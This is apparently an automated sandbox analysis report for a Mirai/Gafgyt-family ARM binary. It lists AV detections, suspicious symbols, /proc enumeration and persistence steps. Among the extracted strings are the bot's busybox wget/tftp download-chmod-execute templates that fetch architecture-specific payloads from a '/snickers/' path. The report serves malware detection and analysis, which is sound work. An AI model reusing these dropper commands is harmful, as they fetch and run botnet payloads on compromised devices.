Linux Analysis Report
Z8xEavXrld

Overview

General Information

Sample Name: Z8xEavXrld
Analysis ID: 679610
MD5: a88fe5d28e2f429c1a9f3f6962d791dc
SHA1: 8ec9d983a5fe3331d828e21a5016e2012ef7a1ba
SHA256: 4c58714e73e90af2e481dca0e772c18d38878934c6c9de747d9de4997b227ad6
Tags: 32armelfgafgyt
Infos:

Detection

Mirai
Score: 60
Range: 0 - 100
Whitelisted: false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Sets full permissions to files and/or directories
Sample contains strings that are potentially command strings
Executes the "mkdir" command used to create folders
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Z8xEavXrld Virustotal: Detection: 40% Perma Link
Source: Z8xEavXrld ReversingLabs: Detection: 48%
Source: Z8xEavXrld String found in binary or memory: http://%d.%d.%d.%d:%d/snickers/%s
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: GET /snickers/arm HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/arm7 HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/mips HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/mipsel HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/powerpc HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/sh4 HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/m68k HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/sparc HTTP/1.0
Sample and/or dropped files contains symbols with suspicious names
Source: Z8xEavXrld ELF static info symbol of initial sample: hide_maps_proc
Source: Z8xEavXrld ELF static info symbol of initial sample: kill_scanners
Source: Z8xEavXrld ELF static info symbol of initial sample: password_size
Source: Z8xEavXrld ELF static info symbol of initial sample: passwords
Source: Z8xEavXrld ELF static info symbol of initial sample: scanner_raw_buf
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: /bin/busybox SNICKERS
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox okayuwu && >okayuwu && /bin/busybox chmod 777 okayuwu
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: >%sokayuwu && cd %s && >retrieve; >okayuwu/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox okayuwu && >okayuwu && /bin/busybox chmod 777 okayuwu
Source: Initial sample String containing 'busybox' found: >>>/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: /bin/busybox DMSNA
Source: Initial sample String containing 'busybox' found: /bin/busybox mkdir %s; >%s.file && cd %s
Source: Initial sample String containing 'busybox' found: /bin/busybox rm -rf .file %s %s
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://%d.%d.%d.%d:%d/snickers/%s -O -> %s; /bin/busybox chmod 777 %s; ./%s telnet.%s.wget; >%s
Source: Initial sample String containing 'busybox' found: /bin/busybox tftp -r %s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s telnet.%s.tftp; >%s
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
Source: Initial sample String containing 'busybox' found: mipsmipselpowerpcsh4m68ksparc/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s
Source: classification engine Classification label: mal60.troj.lin@0/0@0/0
Source: Z8xEavXrld ELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: Z8xEavXrld ELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: Z8xEavXrld ELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: Z8xEavXrld ELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: Z8xEavXrld ELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: Z8xEavXrld ELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: Z8xEavXrld ELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: Z8xEavXrld ELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: Z8xEavXrld ELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/string/arm/_memcpy.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/string/arm/memcpy.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/string/arm/memmove.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/string/arm/memset.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/string/arm/strlen.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/sysdeps/linux/arm/crt1.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/sysdeps/linux/arm/crti.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/sysdeps/linux/arm/crtn.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/sysdeps/linux/arm/sigrestorer.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/sysdeps/linux/arm/vfork.S

Persistence and Installation Behavior
barindex
Sets full permissions to files and/or directories
Source: /bin/sh (PID: 6245) Chmod executable with 777: /usr/bin/chmod -> chmod 777 /rx05a34hf0/rx05a34hf0 Jump to behavior
Executes the "mkdir" command used to create folders
Source: /bin/sh (PID: 6241) Mkdir executable: /usr/bin/mkdir -> mkdir /rx05a34hf0/ Jump to behavior
Sample tries to set the executable flag
Source: /usr/bin/chmod (PID: 6245) File: /rx05a34hf0/rx05a34hf0 (bits: - usr: rwx grp: rwx all: rwx) Jump to behavior
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 6245) Chmod executable: /usr/bin/chmod -> chmod 777 /rx05a34hf0/rx05a34hf0 Jump to behavior
Enumerates processes within the "proc" file system
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1582/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1582/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2033/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2033/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1612/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1612/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1579/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1579/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1699/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1699/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1335/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1335/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1698/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1698/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2028/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2028/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1334/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1334/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1576/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1576/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2025/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2025/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/910/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/910/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/912/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/912/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/517/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/517/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/759/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/759/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/918/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/918/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1594/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1594/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1349/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1349/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1623/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1623/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/761/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/761/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1622/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1622/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/884/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/884/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1983/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1983/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2038/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2038/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1344/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1344/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1465/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1465/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1586/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1586/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1860/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1860/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1463/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1463/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/800/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/800/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/801/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/801/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1629/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1629/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1627/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1627/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1900/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1900/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/491/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/491/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2050/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2050/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1877/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1877/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/772/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/772/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1633/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1633/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1599/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1599/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1632/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1632/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/774/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/774/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1477/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1477/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/654/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/654/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/896/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/896/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1476/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1476/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1872/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1872/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2048/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2048/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/655/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/655/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1475/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1475/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/656/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/656/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/777/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/777/exe Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/657/maps Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/657/exe Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/Z8xEavXrld (PID: 6238) Shell command executed: sh -c "mkdir /rx05a34hf0/ && >/rx05a34hf0/rx05a34hf0 && cd /rx05a34hf0/ >/dev/null" Jump to behavior
Source: /tmp/Z8xEavXrld (PID: 6242) Shell command executed: sh -c "mv /tmp/Z8xEavXrld /rx05a34hf0/rx05a34hf0 && chmod 777 /rx05a34hf0/rx05a34hf0 >/dev/null" Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/Z8xEavXrld (PID: 6231) Queries kernel information via 'uname': Jump to behavior
Source: Z8xEavXrld, 6231.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmp, Z8xEavXrld, 6233.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/Z8xEavXrldSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Z8xEavXrld
Source: Z8xEavXrld, 6231.1.00005644727ab000.00005644728d9000.rw-.sdmp, Z8xEavXrld, 6233.1.00005644727ab000.00005644728d9000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: Z8xEavXrld, 6231.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmp, Z8xEavXrld, 6233.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: Z8xEavXrld, 6231.1.00005644727ab000.00005644728d9000.rw-.sdmp, Z8xEavXrld, 6233.1.00005644727ab000.00005644728d9000.rw-.sdmp Binary or memory string: #|rDVP%|rDVP"|rDV!/etc/qemu-binfmt/arm

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: Z8xEavXrld, type: SAMPLE
Source: Yara match File source: 6233.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6231.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: Z8xEavXrld, type: SAMPLE
Source: Yara match File source: 6233.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6231.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY

No Screenshots

No contacted IP infos